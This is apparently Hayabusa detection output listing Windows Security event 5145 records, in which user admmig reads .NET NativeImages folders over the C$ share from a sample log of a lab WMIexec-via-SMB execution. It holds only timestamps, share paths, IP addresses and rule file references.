0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
